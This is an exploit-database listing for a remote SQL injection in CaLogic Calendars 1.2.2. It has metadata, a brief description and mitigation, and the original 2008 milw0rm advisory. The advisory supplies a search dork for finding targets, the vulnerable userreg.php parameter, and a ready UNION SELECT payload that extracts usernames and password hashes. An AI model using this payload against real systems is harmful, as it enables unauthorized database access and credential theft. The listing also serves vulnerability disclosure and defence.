header-logo
Suggest Exploit
vendor:
Calendars
by:
His0k4
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Calendars
Affected Version From: V1.2.2
Affected Version To: V1.2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:calogic:calendars:1.2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CaLogic Calendars V1.2.2 Remote SQL injection

CaLogic Calendars V1.2.2 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to the database and execute arbitrary SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/       CaLogic Calendars V1.2.2  Remote SQL injection          \
\                                				/
\---------------------------------------------------------------/


[*] Author    : His0k4 [ALGERIAN HaCkEr]

[*] Dork      : "CaLogic Calendars V1.2.2"

[*] POC        : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}

[*] Example    : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--

[*] Note       : You can see the results (user name & password) in "SQL String" line for example {SQL String: select * from clc_lang_admin:21232f297a57a5a743894a0e4a801fc3 where keyid='urth'}
                
----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...

# milw0rm.com [2008-05-13]